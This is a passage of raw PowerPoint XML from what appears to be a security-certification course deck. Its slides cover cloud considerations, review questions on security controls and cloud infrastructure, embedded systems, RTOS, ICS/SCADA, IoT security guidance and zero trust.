              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Considerations</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cost</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Scalability</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Resilience</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ease of deployment</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Ease of recovery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SLA and ISA</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Power</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Compute</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1923044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62A0-233B-D62B-87A6-41F65D09E9B4}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>REVIEW ACTIVITY: Security Control</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D3CEB101-66F3-51B2-804E-63C7386A6F21}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="2249486"/>
            <a:ext cx="9905999" cy="4354513"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>You have implemented a secure web gateway that blocks access to a social networking site. How would you categorize this type of security control?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A company has installed motion-activated floodlighting on the grounds around its premises. What class and function is this security control?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A firewall appliance intercepts a packet that violates policy. It automatically updates its access control list to block all further packets from the source IP. What TWO functions did the security control perform?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>If a security control is described as operational and compensating, what can you determine about its nature and function?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A multinational company manages a large amount of valuable intellectual property (IP) data, plus personal data for its customers and account holders. What type of business unit can be used to manage such important and complex security requirements?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>A business is expanding rapidly, and the owner is worried about tensions between its established IT and programming divisions. What type of security business unit or function could help to resolve these issues?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2904351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BD6B-9B0C-3C8D-FA02-471787D43E2C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Cloud Security Considerations</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6B812CA0-17C7-CF05-AC0A-D966EE94FEEA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1534696" y="2015732"/>
            <a:ext cx="9520158" cy="4131068"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="85000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Data protection</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Patching</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Several factors can make patching cloud infrastructures difficult or even impossible to accomplish consistently. One common challenge is the complexity of cloud systems, which can make it difficult to identify and address vulnerabilities. Additionally, some cloud providers may not allow customers to modify the underlying infrastructure, making it impossible to install patches directly. In a cloud environment, the cloud service provider manages the underlying infrastructure. This lack of control can make it difficult or even impossible to apply patches according to legal and regulatory requirements or timelines.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Secure Communication and Access</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>A Software-Defined Wide Area Network (SD-WAN) </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Secure Access Service Edge (SASE)</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="17251948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FF539-64C2-12F6-FBEE-4437EDCBCE91}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Review Activity: Cloud Infrastructure</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12977A92-3C6B-D2EC-9E43-31680FD35D94}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="457200" lvl="0" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>What is a public cloud?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> What type of cloud solution could be used to implement a SAN?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> What is a Type II hypervisor?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="457200" indent="-457200">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> What is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IaC</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>?</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="32143392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B325-0242-A503-3EF9-9FD076E32DCF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Topic 6B - Embedded Systems and Zero Trust Architecture</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7A59C9E5-9CDC-85F7-C96D-98664C839149}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1866900"/>
            <a:ext cx="9905999" cy="5130800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Embedded systems are used in various specialized applications, including consumer electronics, industrial automation, automotive systems, medical devices, and more. Some examples include the following:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Home appliance</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>s</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Smartphones and tablets</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Automotive systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Industrial automation</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Medical devices</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Aerospace and defense</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="20500319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63F1-B086-067B-E235-A97E2E945497}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Real-Time Operating Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CA1CE6EA-D8E8-B59B-1FD0-420239EAF979}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>A Real-Time Operating Systems (RTOS)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> is a type of operating system designed for use in applications that require real-time processing and response. They</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-ID" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>are purpose-specific operating systems designed for high levels of stability and processing speed.</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Examples of RTOS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Risks Associated with RTOS</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="12675330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6F82F-6672-0EA1-CB39-158DB48F52C3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Industrial Control Systems</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0832E19-7725-2D66-BDD1-BD30D9226AA1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Workflow and Process Automation Systems</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Supervisory Control and Data Acquisition (SCADA)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>ICS/SCADA Applications</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>These types of systems are used within many sectors of industry:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Energy </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Industrial</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Fabrication and manufacturing</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Logistics </a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0">
              <a:effectLst/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Facilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="28684594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A8A1-F05D-8BB5-10D2-7D855B77A46C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0">
                <a:effectLst/>
              </a:rPr>
              <a:t>Internet of Things</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{77F2069D-E288-06FA-2D4E-D8660BD0AC62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1141412" y="1689100"/>
            <a:ext cx="10453688" cy="5003799"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Internet of Things (IoT) refers to the network of physical devices, vehicles, appliances, and other objects embedded with sensors, software, and connectivity, enabling them to collect and exchange data.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>IoT Examples</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Factors Driving Adoption of IoT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="Ø"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Security Risks Associated with IoT</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Best Practice Guidance for IoT</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The following provide guidance regarding the secure implementation of IoT:</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The Internet of Things Security Foundation (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>IoTSF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>iotsecurityfoundation.org</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Industrial Internet Consortium (IIC) Security Framework - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://www.</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>iiconsortium.org/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1"/>
              <a:t>iisf</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cloud Security Alliance (CSA) IoT Security Controls Framework - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>https://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>cloudsecurityalliance.org/artifacts/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0" err="1"/>
              <a:t>iot</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0"/>
              <a:t>-security-controls-framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="0"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>European Telecommunications Standards Institute (ETSI) IoT Security Standards - </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" u="sng" dirty="0">
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://www.etsi.org/technologies/consumer-iot-security</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="8036862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C6EDB-3F51-5A39-9BA3-9C454BA664DC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1"/>
              <a:t>Deperimeterization</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t> and Zero Trust</a:t>
            </a:r>
            <a:endParaRPr lang="en-ID" b="1" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
